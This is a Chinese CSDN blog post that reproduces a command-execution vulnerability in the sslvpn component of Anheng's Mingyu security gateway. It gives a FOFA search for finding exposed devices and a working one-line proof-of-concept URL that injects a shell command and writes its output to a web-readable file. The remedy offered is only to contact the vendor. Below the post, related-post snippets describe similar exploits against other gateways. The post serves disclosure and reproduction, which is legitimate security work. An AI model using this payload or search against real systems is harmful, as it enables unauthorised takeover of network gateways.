【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

最新推荐文章于 2024-07-26 08:57:05 发布

晚风不及你ღ

最新推荐文章于 2024-07-26 08:57:05 发布

阅读量1.2k

点赞数 9

文章标签：安全 web安全网络

本文链接：https://blog.csdn.net/qq_37113223/article/details/136413510

版权

【漏洞复现】专栏收录该内容

146 篇文章 1 订阅

已下架不支持订阅

本文介绍了明御安全网关产品及其存在的sslvpn命令执行漏洞，详细说明了漏洞描述和复现过程，并提供了修复建议，建议用户联系厂商处理。

摘要由CSDN通过智能技术生成

Nx01 产品简介

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念，以资产为视角，构建了全流程防御的下一代安全防护体系。

Nx02 漏洞描述

明御安全网关存在sslvpn命令执行漏洞，攻击者可通过此漏洞获取服务器控制权限。

Nx03 产品主页

fofa-query: web.body="明御安全网关"

Nx04 漏洞复现

POC：

/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

拼接URL/sslvpn/ceshi.txt

Nx05 修复建议

建议联系软件厂商进行处理。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

9
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念，以资产为视角，构建了全流程防御的下一代安全防护体系。
复制链接

扫一扫

专栏目录

已下架不支持订阅

安恒明御网关suffix命令执行漏洞

初岄的博客

10-20

324

安恒明御网关suffix存在命令执行漏洞。

安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现

The current road is different, love needs to distinguish between right and wrong

12-18

625

安恒明御安全网关是一个网络安全产品，由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台，用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件上传漏洞。没有人规定，一朵花一定要成长为向日葵或者玫瑰。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】安恒明御安全网关远程命令执行漏洞

m0_71285176的博客

01-10

1316

明御安全网关秉持安全可视、简单有效的只理念，以资产为视角，构建全流程防御的下一代安全防护体系，并融合传统防火墙、入侵检测、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。明御安全网关aaa_portal_auth_config_reset接口处存在RCE漏洞，攻击者通过漏洞可以获取服务器权限。地址：http://xxx.xxxx.xxx/xxx.php

2024年HW漏洞专项（非常详细）零基础入门到精通，收藏这一篇就够了

最新发布

leah126的博客

07-26

645

Apache软件基金会发布了一则关于其开源云计算平台Apache CloudStack的严重漏洞（CVE-2024-41107）的安全公告。此漏洞影响安全断言标记语言（SAML）认证机制，可能允许攻击者绕过认证，获得对用户账户和资源的未授权访问。

安恒信息-明御安全网关命令执行漏洞分析

wangluoanquan111的博客

03-02

1183

注意漏洞描述漏洞位置漏洞代码。

漏洞复现--安恒明御安全网关 aaa_local_web_preview 任意文件上传

qq_53003652的博客

11-29

1227

安恒明御安全网关是一个网络安全产品，由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台，用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件上传漏洞。限制aaa_local_web_preview的访问权限，联系商家获取修复补丁。success即代表上传成功，访问/test.php。成功解析，可上传免杀木马获取服务器权限。

2021-09-01

m0_51170293的博客

09-01

137

yxcms 红日靶场 /phpadmin root root 御剑扫查看beifen 解压发现这个文件访问 /yxcms 根据提示进来了写马再用蚁剑连马找地方传马前台模板-》管理首页-》index_index.php 不一定非是这个只要是php后缀能写东西而且是在源码里有的文件不是别人写的 yxcms文件里能找到的，用everything可以搜到的写一句话木马 everthing搜该文件的路径为连蚁剑做准备据此找到路径 http://192.168.3

【漏洞复现】迪普-SSL-VPN-任意文件读取

知黑而守白

01-18

190

DPtech VPN是迪普科技面向广域互联应用场景推出的专业安全网关产品，集成了IPSec、SSL、L2TP、GRE等多种VPN技术，支持国密算法，实现分支机构、移动办公人员的统一安全接入，提供内部业务跨互联网的安全访问；支持基于用户、应用的安全策略，同时提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能，可作为总部及分支机构的安全出口；除此以外，实现了集中管理、统一配置，并集成AC和PoE功能，支持3G/4G无线模块扩展，可有效的简化用户组网，降低运维成本。

漏洞复现-网康下一代防火墙 RCE

千寻的博客

04-13

1898

文章目录漏洞描述漏洞影响FOFA漏洞复现第一步登录页面如下第二步发送如下请求包第三步再请求获取命令执行结果漏洞复现poc摘抄漏洞描述奇安信网康下一代防火墙存在远程命令执行，通过漏洞攻击者可以获取服务器权限漏洞影响奇安信网康下一代防火墙 FOFA app="网康科技-下一代防火墙" 漏洞复现第一步登录页面如下第二步发送如下请求包 POST /directdata/direct/router HTTP/1.1 Host: ip Sec-Ch-Ua: "Chromium";

【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件

记录并分享学习安全的知识点..

08-16

411

深信服的数据中心管理系统DC是一种外置的AC（异地扩展备份管理）数据中心，它提供了强大的功能和灵活性，旨在满足日志数据处理的需求。该系统具备多种高级功能，包括多条件组合的高效查询、统计和生成趋势报表，以及实时监控设备的运行状态等。深信服数据中心管理系统存在XXE漏洞。

CVE-2022-40684 Fortinet多个产品身份验证绕过漏洞复现

热爱学习，喜欢折腾！

10-16

1324

Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy 为网站和基于云的应用程序提供安全 Web 网关、安全功能、无与伦比的性能以及最佳用户体验。

Fortigate SSL VPN路径遍历漏洞（CVE-2018-13379）

weixin_44304678的博客

11-06

910

Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素，导致攻击者可以利用该漏洞访问受限目录以外的位置。

安恒明御WEB应用防火墙 report.php 任意用户登录漏洞

holyxp的博客

07-13

1556

安恒明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录，攻击者可以通过漏洞直接登录后台

Ruijie SSL V P N 垂直越权漏洞

weixin_43526443的博客

03-08

3770

【漏洞复现】Ruijie SSL V P N 垂直越权漏洞目录【漏洞复现】Ruijie SSL VPN 垂直越权漏洞 1、漏洞简介 2、漏洞影响 3、漏洞复现 4、漏洞批量检测 5、漏洞修复 1、漏洞简介 Ruijie SSL VPN 垂直越权漏洞，攻击者在已知用户名的情况下(默认adm，未知可Burp进行爆破)，查看服务器资源，以及对账号进行修改密码和绑定手机操作。 2、漏洞影响 Ruijie SSL VPN 3、漏洞复现 3.1先通过Fofa等方...

明御运维审计与风险控制系统漏洞复现_明御堡垒机漏洞

uiuuyy67的博客

04-12

654

为了做好运维面试路上的助攻手，特整理了上百道。

明御运维审计与风险控制系统漏洞复现_明御堡垒机漏洞(1)

2401_84264096的博客

04-11

926

明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞，通过漏洞可以添加除超级管理员权限的其他权限用户从而控制堡垒机。

安恒明御WEB应用防火墙未授权访问

初岄的博客

10-20

305

明御WEB应用防火墙（简称WAF）是一款由安恒信息自主研发，专注为网站、APP等Web应用提供安全防护的专业应用安全防护产品。能够对网站及APP业务流量进行多维度、深层次的安全检测和防护。系统内置五大安全引擎（包括语义分析引擎、机器学习引擎、威胁情报引擎、行为分析引擎、基础特征引擎），可通过主动防护与被动安全相结合的方式识别可疑、已知、未知安全威胁，有效保障网站及APP业务安全、可靠运行。明御WEB应用防火墙系统存在未授权访问漏洞，攻击者通过漏洞可以执行修改配置，导致服务器断网等问题。

详细介绍SSLvpn安全网关和国密浏览器

05-19

SSL VPN安全网关是一种基于SSL协议的VPN技术，它可以通过浏览器等客户端提供远程访问服务，使用户在不同的网络环境下能够安全、便捷地访问内部网络资源。SSL VPN以其易于使用、安全可靠的特点，成为企业远程办公、...